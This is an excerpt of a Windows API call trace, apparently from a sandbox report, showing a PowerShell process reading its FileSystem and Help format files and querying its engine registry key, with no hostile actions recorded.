	[0593.339] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0593.339] GetFileType (hFile=0x324) returned 0x1
	[0593.339] SetErrorMode (uMode=0x1) returned 0x1
	[0593.339] GetFileType (hFile=0x324) returned 0x1
	[0593.339] ReadFile (in: hFile=0x324, lpBuffer=0x2e6db40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2e6db40*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0594.549] ReadFile (in: hFile=0x324, lpBuffer=0x2e6db40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2e6db40*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0594.549] ReadFile (in: hFile=0x324, lpBuffer=0x2e6db40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2e6db40*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0594.549] ReadFile (in: hFile=0x324, lpBuffer=0x2e6db40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2e6db40*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0594.550] ReadFile (in: hFile=0x324, lpBuffer=0x2e6db40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2e6db40*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0594.550] ReadFile (in: hFile=0x324, lpBuffer=0x2e6db40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2e6db40*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0594.550] ReadFile (in: hFile=0x324, lpBuffer=0x2e6db40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2e6db40*, lpNumberOfBytesRead=0x1ed078*=0x119, lpOverlapped=0x0) returned 1
	[0594.550] ReadFile (in: hFile=0x324, lpBuffer=0x2e6db40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2e6db40*, lpNumberOfBytesRead=0x1ed078*=0x0, lpOverlapped=0x0) returned 1
	[0594.550] CloseHandle (hObject=0x324) returned 1
	[0596.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0596.043] SetErrorMode (uMode=0x1) returned 0x1
	[0596.043] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed020 | out: lpFileInformation=0x1ed020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0597.624] SetErrorMode (uMode=0x1) returned 0x1
	[0597.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0597.624] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed108 | out: phkResult=0x1ed108*=0x324) returned 0x0
	[0597.624] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed08c, lpData=0x0, lpcbData=0x1ed088*=0x0 | out: lpType=0x1ed08c*=0x1, lpData=0x0, lpcbData=0x1ed088*=0x56) returned 0x0
	[0597.624] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a14a0
	[0597.624] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed05c, lpData=0x1b9a14a0, lpcbData=0x1ed058*=0x56 | out: lpType=0x1ed05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed058*=0x56) returned 0x0
	[0597.624] CoTaskMemFree (pv=0x1b9a14a0) 
	[0597.625] RegCloseKey (hKey=0x324) returned 0x0
	[0597.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0597.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0597.626] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x3ba41605, Data2=0x504e, Data3=0x43d6, Data4=([0]=0x95, [1]=0xe2, [2]=0xa5, [3]=0x4f, [4]=0xe6, [5]=0x2d, [6]=0x35, [7]=0x87))) returned 0x0
	[0597.626] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x3e9e0cc5, Data2=0xc55b, Data3=0x46e4, Data4=([0]=0x89, [1]=0x3d, [2]=0x28, [3]=0xfc, [4]=0x8d, [5]=0xce, [6]=0x66, [7]=0x74))) returned 0x0
	[0597.626] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x8f820898, Data2=0x5392, Data3=0x4534, Data4=([0]=0xb7, [1]=0x48, [2]=0x5e, [3]=0xee, [4]=0xae, [5]=0xa2, [6]=0xe3, [7]=0xbc))) returned 0x0
	[0597.626] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xaf1a51ed, Data2=0x7c3e, Data3=0x488a, Data4=([0]=0x99, [1]=0x3, [2]=0x58, [3]=0x9e, [4]=0xc4, [5]=0x10, [6]=0x22, [7]=0x53))) returned 0x0
	[0597.626] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0597.627] GetFileType (hFile=0x324) returned 0x1
	[0597.627] SetErrorMode (uMode=0x1) returned 0x1
	[0597.627] GetFileType (hFile=0x324) returned 0x1
	[0597.627] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.637] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.637] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.637] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.638] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.638] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.638] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.638] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.640] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.641] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.641] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.642] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.642] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.642] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.643] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.645] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.648] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.649] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.649] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.649] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.650] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.650] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.650] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.651] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.651] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.652] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.652] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.652] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.653] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.653] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.653] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.654] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.660] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.660] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.660] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.661] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.661] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.661] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.662] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.662] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.662] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.663] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.663] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.663] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.664] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.664] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.664] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.665] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.665] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.665] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.666] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.666] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.666] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.667] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.667] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.667] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.668] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.668] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.668] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.669] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.669] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.669] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0597.670] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0xf37, lpOverlapped=0x0) returned 1
	[0597.670] ReadFile (in: hFile=0x324, lpBuffer=0x2ec937f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec937f*, lpNumberOfBytesRead=0x1ed078*=0x0, lpOverlapped=0x0) returned 1
	[0598.692] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ec9ce0*, lpNumberOfBytesRead=0x1ed078*=0x0, lpOverlapped=0x0) returned 1
	[0598.692] CloseHandle (hObject=0x324) returned 1
	[0598.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0598.692] SetErrorMode (uMode=0x1) returned 0x1
	[0598.693] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed020 | out: lpFileInformation=0x1ed020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0598.693] SetErrorMode (uMode=0x1) returned 0x1
	[0598.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
